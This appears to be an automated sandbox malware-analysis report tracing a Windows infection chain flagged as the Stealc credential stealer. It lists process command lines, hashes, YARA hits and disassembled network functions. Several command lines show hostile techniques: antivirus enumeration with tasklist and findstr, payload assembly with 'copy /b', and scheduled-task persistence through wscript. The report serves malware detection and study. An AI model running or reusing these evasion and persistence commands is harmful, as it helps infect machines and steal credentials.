Path:	C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe"
Imagebase:	0x900000
File size:	526'848 bytes
MD5 hash:	26D8D52BAC8F4615861F39E118EFA28D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	00:08:36
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x730000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	00:08:36
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0x2f0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	00:08:37
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x730000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	00:08:37
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Imagebase:	0x2f0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	00:08:37
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe"
Imagebase:	0x240000
File size:	3'011'584 bytes
MD5 hash:	FA715FFB10963C654D62D2690ACAE23D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.3426127285.0000000001384000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.3212872917.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.3241887546.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.3302300126.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.3274758029.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.3330816935.0000000001383000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.3330670556.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.3270101653.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.3242119222.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.3268957101.0000000001382000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 34%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	00:08:39
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe"
Imagebase:	0xf20000
File size:	2'843'136 bytes
MD5 hash:	97A370ACA7F83E19D8295AF2221BF211
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 34%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	00:08:39
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 197036
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	00:08:39
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
Imagebase:	0x2f0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	00:08:39
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	00:08:39
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif
Wow64 process (32bit):	true
Commandline:	Jurisdiction.pif T
Imagebase:	0x470000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	00:08:40
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x60000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	00:08:41
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe"
Imagebase:	0x440000
File size:	1'853'952 bytes
MD5 hash:	79844A66D5D7D52EC7836502F3F917FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002B.00000003.3052484261.0000000004F50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002B.00000002.3142776921.0000000000441000.00000040.00000001.01000000.00000023.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002B.00000002.3186818225.00000000011CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 45%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	00:08:42
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	00:08:43
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6a5670000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	131
Start time:	00:10:48
Start date:	27/10/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	140
Start time:	00:10:52
Start date:	27/10/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	201
Start time:	00:11:11
Start date:	27/10/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 05130375 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2180328537.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5130000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ca5e7a61aeae67cbbdf732cd75af73279066d214522d0b0d882bcc78cda3fba
Instruction ID: c4fb6103cc8e349551d04205ff20a3181c4f92faf9730ba01b2dc8de209002c3
Opcode Fuzzy Hash: 1ca5e7a61aeae67cbbdf732cd75af73279066d214522d0b0d882bcc78cda3fba
Instruction Fuzzy Hash: 81F0F4E724C110EEF328C5412A3AEBA67EEE6C9730372C826F446C6401D3A48E4A9131

Function 05130361 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2180328537.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5130000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4311d68a6de77e35b95dbaa40b16850b3f67ff060bba9843302fbd716a935479
Instruction ID: c16df003f23a64f7d6f5d0618210f68e0993295e31b2746e69f0e6cc659b5672
Opcode Fuzzy Hash: 4311d68a6de77e35b95dbaa40b16850b3f67ff060bba9843302fbd716a935479
Instruction Fuzzy Hash: 270162E710D150EEF329C5516A3EDBA6BFEE6CA730336C46BF446C6442D3544E4A9232

Function 0513037E Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2180328537.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5130000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a6de3620d96925566e41015bc5739da1e98b1d6d9a22872fe27c0fa0171e7df
Instruction ID: 823833fbbdaee9441195abb38d452c44fba71143984f0045533d9a434080b65f
Opcode Fuzzy Hash: 5a6de3620d96925566e41015bc5739da1e98b1d6d9a22872fe27c0fa0171e7df
Instruction Fuzzy Hash: FFF04FB761C210EEF368D5916A6DEBA63FEE6C8730372C42AF446C6401E3659E4A9131

Function 051303A2 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2180328537.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5130000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d89c5f8e2110cd0984d75d999361193126f55e1f052e3fa0f68229b719e3ee6
Instruction ID: 722483be582e56a25ed2a5d34f6a70dba36cafc2c02d125d15686091b159acbe
Opcode Fuzzy Hash: 0d89c5f8e2110cd0984d75d999361193126f55e1f052e3fa0f68229b719e3ee6
Instruction Fuzzy Hash: ECF0D4B720D110AEF368D5417B3AEBA63EEE6C8730332C827F446C6401D3648E5A9132

Function 051303B1 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2180328537.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5130000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78b9c0e726297fadfc2044d871b20a499403fbf91fa47a349cff90dec497ad30
Instruction ID: b68f39b87a7cf66fd593495ca70620e197b662b4327e144be639b3cb8d7a7b92
Opcode Fuzzy Hash: 78b9c0e726297fadfc2044d871b20a499403fbf91fa47a349cff90dec497ad30
Instruction Fuzzy Hash: 48F01CB720C110EEF328C5527A7AEBA63EEE6C8730372C927F446D7401D3658E5A9131

Function 051303D9 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2180328537.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5130000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c92e8d899abdb23194c46d96e3c84f1ae28866b0fe36c5b8b35671aebdef48cf
Instruction ID: 77c2c33b38c2eac1d5316b25d35de55a15fb6898ed455ecc87491e984a1096f7
Opcode Fuzzy Hash: c92e8d899abdb23194c46d96e3c84f1ae28866b0fe36c5b8b35671aebdef48cf
Instruction Fuzzy Hash: 7DE0E5EA10D410AEB228D1527E3AAF753ADD3D8B30372C916F446D6482D2594F8A5072

Function 051303F0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2180328537.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5130000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30eefef873acd4493a009e476dafcba7350258627b9476db13cf129a61297f0b
Instruction ID: adff58a0a068373fadad8377d644d4694219be7c9e206044130e5e26970c3452
Opcode Fuzzy Hash: 30eefef873acd4493a009e476dafcba7350258627b9476db13cf129a61297f0b
Instruction Fuzzy Hash: 2AE0D8A7509124ADE255D5513A3AAB767BDD7C5A31372C43BF807C5442D2090F5D41B1

Function 0513041E Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2180328537.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5130000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 151eab7abc7c968ba725de037864590b104f3fcf1d4ea2ad5448b12dc97e45f5
Instruction ID: d490a609374bcc30b7b8e5d528f0d3f71161c70bb077baa6b8fd8ddd9a2c970e
Opcode Fuzzy Hash: 151eab7abc7c968ba725de037864590b104f3fcf1d4ea2ad5448b12dc97e45f5
Instruction Fuzzy Hash: 4CE0C22210C1108ED339E6516A7EBB42BE2F74D31536244A7E0828B582C7664F5AC362

Analysis Process: axplong.exePID: 3924, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.1%
Total number of Nodes:	1736
Total number of Limit Nodes:	73

Executed Functions

Function 0026BD60 Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(002B8D70,00000000,00000000,00000000,00000000), ref: 0026BDED
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0026BE11
HttpOpenRequestA.WININET(?,00000000), ref: 0026BE5B
HttpSendRequestA.WININET(?,00000000), ref: 0026BF1B
InternetReadFile.WININET(?,?,000003FF,?), ref: 0026BFCD
InternetReadFile.WININET(?,?,000003FF,?,?,?,?,?), ref: 0026C081
InternetCloseHandle.WININET(?), ref: 0026C0A7
InternetCloseHandle.WININET(?), ref: 0026C0AF
InternetCloseHandle.WININET(?), ref: 0026C0B7

Strings

8KG0fymoFx==, xrefs: 0026C2EB, 0026C543
RHYTYv==, xrefs: 0026BE33
stoi argument out of range, xrefs: 0026E3FA
8KG0fCKZFzY=, xrefs: 0026C385
invalid stoi argument, xrefs: 0026E404
d4,, xrefs: 0026E2FF
RpKt, xrefs: 0026D516

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$d4,$invalid stoi argument$stoi argument out of range
API String ID: 1354133546-3871744267
Opcode ID: aba65ebd614a6d5ef5de7cdd058636f85b05962333ca56a7ec708f0829012cbb
Instruction ID: 30f6b4d7186619dc83caa7750d029c2762f960eaaf815c97010585ca0cd4d483
Opcode Fuzzy Hash: aba65ebd614a6d5ef5de7cdd058636f85b05962333ca56a7ec708f0829012cbb
Instruction Fuzzy Hash: 73B107B16201189BEB24DF28CC84BEEBB79EF45304F6081A9F90897291D7719AD4CF95

Function 002665B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00266650

Strings

RBPleCSm, xrefs: 0026666C
IVKsgL==, xrefs: 002667A1
GVQsgL==, xrefs: 002666F8

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: AccountLookupName
String ID: GVQsgL==$IVKsgL==$RBPleCSm
API String ID: 1484870144-3856690409
Opcode ID: 5ecb7fe47e222585d7142789a1e0796b0be29712cc46ef4c6cba6d9adff18d75
Instruction ID: 8a34cee787e934cad99a2e00ad5435b94281531d8ca640d1670ebb8b616dc761
Opcode Fuzzy Hash: 5ecb7fe47e222585d7142789a1e0796b0be29712cc46ef4c6cba6d9adff18d75
Instruction Fuzzy Hash: 1491B1B19101189BDB28DF24CC89BEDB779EB45304F4085E9E50997282DA349FD8CFA5

Function 0027D312 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0026247E

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 45171f2708c1c5f1a78d8691595ed78b44029e230a2c4d3d1fbb1c43150dbc1f
Instruction ID: ccb59c036bb0fb67d12ba4efefaf243c14f3ed499cdaacda03ef922e5ecb9ed7
Opcode Fuzzy Hash: 45171f2708c1c5f1a78d8691595ed78b44029e230a2c4d3d1fbb1c43150dbc1f
Instruction Fuzzy Hash: 8E518DB2920606DFDB29CF55E885BAAB7F0FF58310F24856AD408EB250D774D950CF90

Function 002746C0 Relevance: 37.0, APIs: 1, Strings: 22, Instructions: 2484COMMON

Download Yara Rule

Strings

9526, xrefs: 0027531D
V0x6, xrefs: 0027541E
JB6, xrefs: 002753F5
-,, xrefs: 00274F3A
aZT6, xrefs: 002753CC
8ZF6, xrefs: 00275502
aqB6, xrefs: 002754DB
mP=, xrefs: 00276383, 00276652
246122658369, xrefs: 00274F4D, 00274F8F, 00274F99, 002754F4
KFT0PL==, xrefs: 002754B9
Fz==, xrefs: 00274D2D
MJB+, xrefs: 00274776, 002747ED, 00274A95, 00274B0C
9KN6, xrefs: 00275351
WJP6, xrefs: 002753A3
stoi argument out of range, xrefs: 00274EAC
6F9fr==, xrefs: 00274712
V0N6, xrefs: 0027537A
fed3aa, xrefs: 00275489
96B6, xrefs: 00275470
Vp 6, xrefs: 00275447
5F6, xrefs: 00275497
MJF+, xrefs: 002747BD, 002748EC, 00274ADC, 00274C0B

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequest
String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range$-,
API String ID: 3545240790-1323897623
Opcode ID: c0dff4be7168229625e59996770ff635b2fe3f61c650feb38cd7fbc11704d9a1
Instruction ID: d53e1b528bc9725c0da38bc1f93b0d643fe925481b8f0569065c69c547eb696e
Opcode Fuzzy Hash: c0dff4be7168229625e59996770ff635b2fe3f61c650feb38cd7fbc11704d9a1
Instruction Fuzzy Hash: 83231471A201588BEB19DB28CD8979DBB769F81304F54C1D8E00CA72C6EB755FA4CF91

Function 00265DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000423, xrefs: 0026600A
0000043f, xrefs: 0026603B
00000422, xrefs: 00265FD9
Keyboard Layout\Preload, xrefs: 00265F64
00000419, xrefs: 00265FA8

Memory Dump Source

Source File: 00000007.00000002.4553251957.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000007.00000002.4552780057.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4553251957.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4555787110.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000052B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.000000000055B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000563000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4556562493.0000000000571000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4558299210.0000000000572000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559027393.0000000000711000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.4559235808.0000000000713000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 17739f8965073ab67ac339012a26448a346e0495bf676121e21ac1fbde995f78
Instruction ID: 9e96b55c21ea076576e7ab7af9d5d43e12ee238439401247d01b14eb1a964d2d
